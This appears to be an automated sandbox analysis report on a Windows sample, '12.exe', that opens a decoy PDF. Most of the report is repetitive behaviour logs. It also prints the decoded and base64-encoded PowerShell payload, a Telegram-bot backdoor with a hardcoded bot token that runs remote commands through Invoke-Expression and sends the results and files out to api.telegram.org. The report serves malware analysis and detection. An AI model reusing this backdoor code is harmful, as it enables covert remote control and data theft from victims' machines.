Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4669Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5175Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5295Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4401Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6908Thread sleep count: 4669 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep count: 5175 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep count: 5295 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016Thread sleep count: 4401 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076Thread sleep time: -23058430092136925s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7316Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7032Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0AAE0 FindFirstFileExW,0_2_00007FF767F0AAE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQA
Source: svchost.exe, 00000006.00000002.3406674125.000001FD0B65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3406190590.000001FD0602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3406212110.000001FD06040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EF7D74 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF767EF7D74
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EF7D74 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF767EF7D74
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F0BDD4 GetProcessHeap,0_2_00007FF767F0BDD4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EF87DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF767EF87DC
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EF8C90 SetUnhandledExceptionFilter,0_2_00007FF767EF8C90
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EFF45C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF767EFF45C
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EF8AB0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF767EF8AB0

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\12.exeProcess created: Base64 decoded $Token = "7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0"$URL = "https://api.telegram.org/bot{0}" -f $Token$lastID = 123$sleepTime = 2$identifier = -join ((48..57) | Get-Random -Count 5 | % {[char]$_})function Invoke-BotCmd { param ( $command ) try { $result = Invoke-Expression($command) } catch { $result = $Error[0].Exception } $res = "[$identifier]%0D%0A" $result | ForEach-Object {$res += [string]$_ + "%0D%0A"} if($res -eq ""){ $lastID = $updateid continue } if($res.Length -gt 4095){ for ($i = 0; $i -lt $res.Length / 4095; $i++) { $begin = $i * 4095 $end = $begin + 4094 if($end -gt $res.Length){ $end = $res.Length } $data = "chat_id=$from&text=" + $res[$begin..$end] $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null } } else { $data = "chat_id=$from&text=$res" $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null }}function Invoke-BotDownload { param ( $FilePath ) Add-type -AssemblyName System.Net.Http $FieldName = 'document' $httpClientHandler = New-Object System.Net.Http.HttpClientHandler $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler $FileStream = [System.IO.FileStream]::new($FilePath,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $Token = "7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0"$URL = "https://api.telegram.org/bot{0}" -f $Token$lastID = 123$sleepTime = 2$identifier = -join ((48..57) | Get-Random -Count 5 | % {[char]$_})function Invoke-BotCmd { param ( $command ) try { $result = Invoke-Expression($command) } catch { $result = $Error[0].Exception } $res = "[$identifier]%0D%0A" $result | ForEach-Object {$res += [string]$_ + "%0D%0A"} if($res -eq ""){ $lastID = $updateid continue } if($res.Length -gt 4095){ for ($i = 0; $i -lt $res.Length / 4095; $i++) { $begin = $i * 4095 $end = $begin + 4094 if($end -gt $res.Length){ $end = $res.Length } $data = "chat_id=$from&text=" + $res[$begin..$end] $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null } } else { $data = "chat_id=$from&text=$res" $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null }}function Invoke-BotDownload { param ( $FilePath ) Add-type -AssemblyName System.Net.Http $FieldName = 'document' $httpClientHandler = New-Object System.Net.Http.HttpClientHandler $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler $FileStream = [System.IO.FileStream]::new($FilePath,
Source: C:\Users\user\Desktop\12.exeProcess created: Base64 decoded $Token = "7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0"$URL = "https://api.telegram.org/bot{0}" -f $Token$lastID = 123$sleepTime = 2$identifier = -join ((48..57) | Get-Random -Count 5 | % {[char]$_})function Invoke-BotCmd { param ( $command ) try { $result = Invoke-Expression($command) } catch { $result = $Error[0].Exception } $res = "[$identifier]%0D%0A" $result | ForEach-Object {$res += [string]$_ + "%0D%0A"} if($res -eq ""){ $lastID = $updateid continue } if($res.Length -gt 4095){ for ($i = 0; $i -lt $res.Length / 4095; $i++) { $begin = $i * 4095 $end = $begin + 4094 if($end -gt $res.Length){ $end = $res.Length } $data = "chat_id=$from&text=" + $res[$begin..$end] $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null } } else { $data = "chat_id=$from&text=$res" $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null }}function Invoke-BotDownload { param ( $FilePath ) Add-type -AssemblyName System.Net.Http $FieldName = 'document' $httpClientHandler = New-Object System.Net.Http.HttpClientHandler $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler $FileStream = [System.IO.FileStream]::new($FilePath, Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $Token = "7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0"$URL = "https://api.telegram.org/bot{0}" -f $Token$lastID = 123$sleepTime = 2$identifier = -join ((48..57) | Get-Random -Count 5 | % {[char]$_})function Invoke-BotCmd { param ( $command ) try { $result = Invoke-Expression($command) } catch { $result = $Error[0].Exception } $res = "[$identifier]%0D%0A" $result | ForEach-Object {$res += [string]$_ + "%0D%0A"} if($res -eq ""){ $lastID = $updateid continue } if($res.Length -gt 4095){ for ($i = 0; $i -lt $res.Length / 4095; $i++) { $begin = $i * 4095 $end = $begin + 4094 if($end -gt $res.Length){ $end = $res.Length } $data = "chat_id=$from&text=" + $res[$begin..$end] $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null } } else { $data = "chat_id=$from&text=$res" $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null }}function Invoke-BotDownload { param ( $FilePath ) Add-type -AssemblyName System.Net.Http $FieldName = 'document' $httpClientHandler = New-Object System.Net.Http.HttpClientHandler $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler $FileStream = [System.IO.FileStream]::new($FilePath, Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQJump to behavior
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "start-process 'c:\users\user\appdata\local\temp\/file.pdf'; powershell.exe -e 'jabuag8aawblag4aiaa9acaaiga3aduanqa0admamaa3adyanga5adoaqqbbaeuaxwbsag4auqbuafkauwbyahyadqbzageaswbsagsacaboahiadgayaeqadgbzahuaqwa3aegaaabjadaacwawaciadqakacqavqbsaewaiaa9acaaigboahqadabwahmaogavac8ayqbwagkalgb0aguabablagcacgbhag0algbvahiazwavagiabwb0ahsamab9aciaiaatagyaiaakafqabwbraguabganaaoajabsageacwb0aekaraagad0aiaaxadiamwanaaoajabzagwazqblahaavabpag0azqagad0aiaayaa0acgakagkazablag4adabpagyaaqblahiaiaa9acaalqbqag8aaqbuacaakaaoadqaoaauac4anqa3ackaiab8acaarwblahqalqbsageabgbkag8abqagac0aqwbvahuabgb0acaanqagahwaiaalacaaewbbagmaaabhahiaxqakaf8afqapaa0acganaaoazgb1ag4aywb0agkabwbuacaasqbuahyabwbragualqbcag8adabdag0azaagahsadqakacaaiaagacaacabhahiayqbtacaakaanaaoaiaagacaaiaagacaaiaagacqaywbvag0abqbhag4azaanaaoaiaagacaaiaapaa0acgagacaaiaagahqacgb5acaaewanaaoaiaagacaaiaagacaaiaagacqacgblahmadqbsahqaiaa9acaasqbuahyabwbragualqbfahgacabyaguacwbzagkabwbuacgajabjag8abqbtageabgbkackadqakacaaiaagacaafqanaaoaiaagacaaiabjageadabjaggaiab7aa0acgagacaaiaagacaaiaagacaajabyaguacwb1agwadaagad0aiaakaeuacgbyag8acgbbadaaxqauaeuaeabjaguacab0agkabwbuaa0acgagacaaiaagah0adqakacaaiaagacaajabyaguacwagad0aiaaiafsajabpagqazqbuahqaaqbmagkazqbyaf0ajqawaeqajqawaeeaiganaaoaiaagacaaiaakahiazqbzahuabab0acaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsajabyaguacwagacsapqagafsacwb0ahiaaqbuagcaxqakaf8aiaaracaaigaladaaraaladaaqqaiah0adqakaa0acgagacaaiaagagkazgaoacqacgblahmaiaataguacqagaciaigapahsadqakacaaiaagacaaiaagacaaiaakagwayqbzahqasqbeacaapqagacqadqbwagqayqb0aguaaqbkaa0acgagacaaiaagacaaiaagacaaywbvag4adabpag4adqblaa0acgagacaaiaagah0adqakacaaiaagacaaaqbmacgajabyaguacwauaewazqbuagcadaboacaalqbnahqaiaa0adaaoqa1ackaewanaaoaiaagacaaiaagacaaiaagagyabwbyacaakaakagkaiaa9acaamaa7acaajabpacaalqbsahqaiaakahiazqbzac4atablag4azwb0aggaiaavacaanaawadkanqa7acaajabpacsakwapacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiaguazwbpag4aiaa9acaajabpacaakgagadqamaa5aduadqakacaaiaagacaaiaagacaaiaagacaaiaagacqazqbuagqaiaa9acaajabiaguazwbpag4aiaaracaanaawadkanaanaaoaiaagacaaiaagacaaiaagacaaiaagacaaaqbmacgajablag4azaagac0azwb0acaajabyaguacwauaewazqbuagcadaboackaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaakaguabgbkacaapqagacqacgblahmalgbmaguabgbnahqaaaanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabkageadabhacaapqagaciaywboageadabfagkazaa9acqazgbyag8abqamahqazqb4ahqapqaiacaakwagacqacgblahmawwakagiazqbnagkabgauac4ajablag4azabdaa0acgagacaaiaagacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqazabhahqayqaiaa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabvafiasqagad4aiaakag4adqbsagwadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0aiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacqazabhahqayqagad0aiaaiagmaaabhahqaxwbpagqapqakagyacgbvag0ajgb0aguaeab0ad0ajabyaguacwaiacaadqakacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabva
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabuag8aawblag4aiaa9acaaiga3aduanqa0admamaa3adyanga5adoaqqbbaeuaxwbsag4auqbuafkauwbyahyadqbzageaswbsagsacaboahiadgayaeqadgbzahuaqwa3aegaaabjadaacwawaciadqakacqavqbsaewaiaa9acaaigboahqadabwahmaogavac8ayqbwagkalgb0aguabablagcacgbhag0algbvahiazwavagiabwb0ahsamab9aciaiaatagyaiaakafqabwbraguabganaaoajabsageacwb0aekaraagad0aiaaxadiamwanaaoajabzagwazqblahaavabpag0azqagad0aiaayaa0acgakagkazablag4adabpagyaaqblahiaiaa9acaalqbqag8aaqbuacaakaaoadqaoaauac4anqa3ackaiab8acaarwblahqalqbsageabgbkag8abqagac0aqwbvahuabgb0acaanqagahwaiaalacaaewbbagmaaabhahiaxqakaf8afqapaa0acganaaoazgb1ag4aywb0agkabwbuacaasqbuahyabwbragualqbcag8adabdag0azaagahsadqakacaaiaagacaacabhahiayqbtacaakaanaaoaiaagacaaiaagacaaiaagacqaywbvag0abqbhag4azaanaaoaiaagacaaiaapaa0acgagacaaiaagahqacgb5acaaewanaaoaiaagacaaiaagacaaiaagacqacgblahmadqbsahqaiaa9acaasqbuahyabwbragualqbfahgacabyaguacwbzagkabwbuacgajabjag8abqbtageabgbkackadqakacaaiaagacaafqanaaoaiaagacaaiabjageadabjaggaiab7aa0acgagacaaiaagacaaiaagacaajabyaguacwb1agwadaagad0aiaakaeuacgbyag8acgbbadaaxqauaeuaeabjaguacab0agkabwbuaa0acgagacaaiaagah0adqakacaaiaagacaajabyaguacwagad0aiaaiafsajabpagqazqbuahqaaqbmagkazqbyaf0ajqawaeqajqawaeeaiganaaoaiaagacaaiaakahiazqbzahuabab0acaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsajabyaguacwagacsapqagafsacwb0ahiaaqbuagcaxqakaf8aiaaracaaigaladaaraaladaaqqaiah0adqakaa0acgagacaaiaagagkazgaoacqacgblahmaiaataguacqagaciaigapahsadqakacaaiaagacaaiaagacaaiaakagwayqbzahqasqbeacaapqagacqadqbwagqayqb0aguaaqbkaa0acgagacaaiaagacaaiaagacaaywbvag4adabpag4adqblaa0acgagacaaiaagah0adqakacaaiaagacaaaqbmacgajabyaguacwauaewazqbuagcadaboacaalqbnahqaiaa0adaaoqa1ackaewanaaoaiaagacaaiaagacaaiaagagyabwbyacaakaakagkaiaa9acaamaa7acaajabpacaalqbsahqaiaakahiazqbzac4atablag4azwb0aggaiaavacaanaawadkanqa7acaajabpacsakwapacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiaguazwbpag4aiaa9acaajabpacaakgagadqamaa5aduadqakacaaiaagacaaiaagacaaiaagacaaiaagacqazqbuagqaiaa9acaajabiaguazwbpag4aiaaracaanaawadkanaanaaoaiaagacaaiaagacaaiaagacaaiaagacaaaqbmacgajablag4azaagac0azwb0acaajabyaguacwauaewazqbuagcadaboackaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaakaguabgbkacaapqagacqacgblahmalgbmaguabgbnahqaaaanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabkageadabhacaapqagaciaywboageadabfagkazaa9acqazgbyag8abqamahqazqb4ahqapqaiacaakwagacqacgblahmawwakagiazqbnagkabgauac4ajablag4azabdaa0acgagacaaiaagacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqb